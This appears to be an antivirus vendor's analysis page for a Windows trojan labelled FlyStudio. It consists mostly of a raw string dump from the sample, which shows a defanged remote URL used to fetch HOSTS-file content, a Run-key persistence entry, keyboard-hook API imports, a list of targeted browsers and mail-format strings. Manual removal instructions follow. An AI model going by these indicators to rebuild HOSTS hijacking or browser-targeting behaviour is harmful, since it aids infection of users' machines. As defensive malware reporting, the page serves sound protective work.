-2!16 27!6:%7<(7?%<D&@G'CJ)EL,HO/KR/LS1NU2MW3NX3NX4PW7SY7SZ7R\6Q[6SZ5RY6RY8T[2NU4PW4PW4QX4PW5QX3OV4PW4PW4PW5QX4PW4PW7SZ8T[6RX8TZ7SY8TZ7SY6RY5QX4PW5QX3PW4PW3PV5QW3PW4PW4PW4PW3OV4PW7SY7SZ7SZ7SZ7SZ7SZ5RY7SZ3PV3OU4OY4PW4PW6PW4PW3OY3NX6PW5QX4OY5PZ5PZ4PW4PW4PW7SZ9SY7SY6RX7SY7SY8RX8T[.JT3NZ7QW7SY,LR

(.Vju

/4!08%4<%7<$9=%<C&@F)CI)EK,HO-JQ.JT1MW2OV2OV2OV3PW7SZ7SZ6RY6RY7T[6SZ6RY8T[3OV4PW4PW4PW3PW5QX3OV4PW3PW3PW3OV4PW4PV7SY7SY8TZ8TZ6RX8TZ8TZ7S]3OY4PW4PW3OV2OV4QX0PV3OV4PW3OV4PW5QX3OV7SZ7SZ8RY8RY6RY7SZ7T[7SZ5QX4PW4PW4PW6RY3OV4PW5QX2NU4QX4PV3OU4PW6PW6RY5QX5QX7SZ8TZ9U[6RY7SZ:T[7SZ7SZ/KR5PZ5OV8RY.KQ

]{~.JQ"<BY{

,1 05#38$49%7<'9>%<D(?G)CI EK,HO.JQ0LS2NU3OV3OV3OV4QW6RX7SZ7SZ7SZ8T[7SZ6RY7SZ5QX5QX4PW4PW4QX2OV4QX3PW4QW4QW3PV4QW6RY6RY7SZ7SZ6RY8T[7SZ7SZ7R\4OY3OY4QX2OV2OV3PW3PW4PV5QX4PW4PW4PW4PV5QW8TZ7R\6Q[7SZ8T[6SZ6SZ4PZ3OY4PW3OV7QX6PW5OV6PW3OV5QX3PV3PV3OU4PV4PV3OU4PV7SY6SZ7SZ7SZ7T[6SZ9U\5QX1MT3PW3PW6RX/HX

/// ???...XXX

"""###"""###"""!!!

~~~___^^^"""

......---...------...---...///......---......---...------...//////---...///...000EEECCCDDDCCC///111///333//////333555GGGHHHGGGGGG......111000///666<<<444000111000//////000...///...999FFFFFF@@@999333,,,111......---***...444;;;<<<>>>888,,,---...000000...,,,///,,,666MMMMMMLLLDDD888000111---...111---//////---///000------...LLLJJJMMMLLL---,,,...???MMMMMMKKK999,,,      ---...---/////////.........///---,,,   ------...000---      ---,,,DDD(((

((('''&&&))),,,)))(((

%%%***'''

<<<:::555444888

???<<<333555&&&

>>>@@@777888

...DDD;;;:::;;;777

...KKK@@@===@@@???!!!

...CCC

...TTTAAAAAABBBAAA!!!

...LLL

444\\\...

444,,,000---

...mmmjjjkkkllllllmmmnnnmmmlllllljjjmmmooommmkkkmmmkkkooolllnnnmmmlllccceeeeeebbb'''lllccc

$$$%%%###%%%###

)1.JQ

 0 .3"14"36#5:$8?$9=#=D&@G'BL)DN,HO-IP/KR2NU2NU3OV3OV5QX5QX7SZ6R\6R\7SY7SY7SZ7SZ5QW4PV4PW4OY4OY4OY4OY4OY4PW4PW4PV3OU3PW6SZ7T[6RY7SZ7SZ7SZ7SZ6RY5QW3OV4OY5QX3NX4NZ4OY4PZ4PW4PW3PW4PZ5QX7SY7SY7SZ7SZ7SZ7R\6SZ6RY4PW4PV4PW4PW4PW4QX3PW4QX3PV4PV4PW4PW4PW4PW4PW4PW5QX9SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

-IZ.J[.KZ0JZ'>T

.1!25"27!38&8=%:>&=E%?F EL)DN-HR-HR0JV1KW1NT3OU3OU4PV6SV6SV6RX:TZ7T[6SZ5QX8T[2NU6RY4PW4PW4OY5PZ2LX5O[5O[3MY5O[4NZ5QW6RX7SY8TZ6RX7SY6RX7SY7R\6Q[4OY1NU4PZ4PZ4PZ5QX4PW5QX4PW5QX4PW4PW8TZ7SY7SY7SZ7SZ7SY6RX6RX4PW4PW4PW3OV6PW6PW4PW4PW2NT5QW3PW3PW4OY5PZ3NX3MY5PZ6Q[8TZ6RX7SY8TZ8U[7SY7SY.JQ3QT2NX9TW.IS

,/!/4"14"36%5:&8=$9=#=D&@G'BL)DN,HO.JQ/KR1MT2NU3OV3OV5QX4QX7SZ6R\6R\7SY7SY7SZ7SY5QW4PV4PW3OY4OY3NX3NX4OY4PW4PV4PV3OV4PW6RY7SZ6RY7SZ7SZ7SZ6RY6RY5QX4PW4NZ4QX4OY3OY3PW5RY4PW3PW3OY3PW4PW7SY7SZ7SZ7SZ7SZ7SZ7SZ6RY4PV4PV4PV4PW4PV2OV3PW3PV3PW4PV4PW3PW3PW3PW4PW4PW5QX7SZ7SZ8TZ8TZ7SY7SY8T[6Q[/JT3PW1QV7Q].KQ

&CR(CW'AQ DT*BT.EU)GS*DQ*CS'@R*DQ

.Xu1GY.KZ.I]

.GY1GY-IZ*IX&?O

$$$&&&###"""$$$

...###@@@...YYY

***,,,000

///...

!!!111000555444\\\

###222777

)))444666999444

999777;;;888

666555!!!

666...888;;;[[[

888:::===???

666222;;;???^^^

Ýdlllnnnlllkkklllmmmlllmmmmmmkkkkkklllmmmmmmmmmnnnnnnkkknnnmmmkkkmmmuuu

}}}___```

$$$%%%$$$%%%$$$

\\\hhhppp111''' *** ===...ZZZ

}}}---,,,

(7),01444

'9=82<.342

9T.mn,

%fkk4

{`.cF

-.VU2

1975/08/21

, #&')*)

-0-(0%()(

.In4i.o-

1900/01/01

2007:02:07 02:59:30

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

\\.\Scsi0:

\\.\PhysicalDrive0

%s:%d

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

(*.htm;*.html)|*.htm;*.html

its:%s::%s

x86 Family %s Model %s Stepping %s

X-X-X-X

.PAVCOleException@@

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCOleDispatchException@@

.PAVCArchiveException@@

c:\%original file name%.exe

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

inflate 1.2.3 Copyright 1995-2005 Mark Adler

#include "l.chs\afxres.rc" // Standard components

WinExec

RegCreateKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

GetKeyState

GetKeyboardType

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

1.0.0.0

windowswf

mscoree.dll

_ChangePassword

(*.*)

2bcd58.exe_2216:

`.rsrc

t$(SSh

~%UVW

u$SShe

Bv=kAv.SCv

user32.dll

kernel32.dll

Kernel32.dll

OLEACC.DLL

ws2_32.dll

TCPHeader

windowswf

hXXp://VVV.hqkjwy.com:88/hosts1.txt

%System%\drivers\etc\hosts

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

hXXp://VVV.hqkjwy.com:88/dk.txt

@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

z>Windows 2000

@Windows XP

@Windows 2003

@Windows Vista

@Windows 7

@Windows 8

WinHttp.WinHttpRequest.5.1

HTTP/1.1

hXXp://

iexplore.exe

liebao.exe

maxthon.exe

360se.exe

2345Explorer.exe|2345EX~1.EXE

firefox.exe

hao123Juzi.exe

SogouExplorer.exe

QQBrowser.exe

opera.exe

TaoBrowser.exe

Chrome_OmniboxView

TangoWeb.exe

TheWorld.exe

UCBrowser.exe

baidubrowser.exe

360chrome.exe

TTraveler.exe

|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|

f1browser.exe

2345chrome.exe

chrome.exe

&7http

VBScript.RegExp

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

packet.dll

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

C:\Windows\system32\2bcd58.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegDeleteKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

ShellExecuteA

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

GetKeyboardLayout

VkKeyScanExA

keybd_event

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

.text

`.rdata

@.data

.rsrc

UrlA3%

}.mKK;

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false"/> </requestedPrivileges> </security></trustInfo></assembly>PAD

KERNEL32.DLL

ADVAPI32.dll

COMCTL32.dll

comdlg32.dll

GDI32.dll

ole32.dll

OLEAUT32.dll

RASAPI32.dll

SHELL32.dll

USER32.dll

WININET.dll

WINMM.dll

WINSPOOL.DRV

WS2_32.dll

(*.*)

1.0.0.0

2bcd58.exe_2216_rwx_00401000_000EF000:

t$(SSh

~%UVW

u$SShe

Bv=kAv.SCv

user32.dll

kernel32.dll

Kernel32.dll

OLEACC.DLL

ws2_32.dll

TCPHeader

windowswf

hXXp://VVV.hqkjwy.com:88/hosts1.txt

%System%\drivers\etc\hosts

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

# 102.54.94.97 rhino.acme.com # source server

# 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

hXXp://VVV.hqkjwy.com:88/dk.txt

@SOFTWARE\Microsoft\Windows\CurrentVersion\Run\

z>Windows 2000

@Windows XP

@Windows 2003

@Windows Vista

@Windows 7

@Windows 8

WinHttp.WinHttpRequest.5.1

HTTP/1.1

hXXp://

iexplore.exe

liebao.exe

maxthon.exe

360se.exe

2345Explorer.exe|2345EX~1.EXE

firefox.exe

hao123Juzi.exe

SogouExplorer.exe

QQBrowser.exe

opera.exe

TaoBrowser.exe

Chrome_OmniboxView

TangoWeb.exe

TheWorld.exe

UCBrowser.exe

baidubrowser.exe

360chrome.exe

TTraveler.exe

|liebao.exe|vary.exe|went.exe|miniie.exe|cpopmus32ex.exe|crowd.exe|slowt32ex.exe|

f1browser.exe

2345chrome.exe

chrome.exe

&7http

VBScript.RegExp

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

iphlpapi.dll

SHLWAPI.dll

MPR.dll

VERSION.dll

WSOCK32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

Advapi32.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

packet.dll

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

HTTP/1.0

%s <%s>

Reply-To: %s

From: %s

To: %s

Subject: %s

Date: %s

Cc: %s

%a, %d %b %Y %H:%M:%S

SMTP

;3 #>6.&

'2, / 0&7!4-)1#

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

C:\Windows\system32\2bcd58.exe

#include "l.chs\afxres.rc" // Standard components

GetCPInfo

WinExec

GetProcessHeap

RegCloseKey

RegOpenKeyExA

RegCreateKeyA

RegDeleteKeyA

RegCreateKeyExA

GetViewportExtEx

GetViewportOrgEx

ScaleViewportExtEx

SetViewportExtEx

OffsetViewportOrgEx

SetViewportOrgEx

ShellExecuteA

GetKeyState

SetWindowsHookExA

UnhookWindowsHookEx

GetKeyboardLayout

VkKeyScanExA

keybd_event

CreateDialogIndirectParamA

InternetCanonicalizeUrlA

InternetCrackUrlA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

.text

`.rdata

@.data

.rsrc

(*.*)

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Scan a system with an anti-rootkit tool.
Terminate malicious process(es) (How to End a Process With the Task Manager):

29c2bf.exe:3248
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:

C:\Windows\System32\2bcd58.exe (678 bytes)
C:\Windows\29c2bf.exe (506 bytes)
C:\Windows\Temp\1.sys.rar (1994 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\SafeWall[1].rar (2835 bytes)
C:\Windows\System32\drivers\etc\hosts (826 bytes)
Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"windowswf" = "C:\Windows\system32\2bcd58.exe"
Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
127.0.0.1 localhost
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Permalink

Back to the blog

e-mail

Google+

Twitter

Facebook

Trojan.Win32.FlyStudio_60883406fe

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet

Trojan.Win32.FlyStudio_60883406fe

E-mail

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet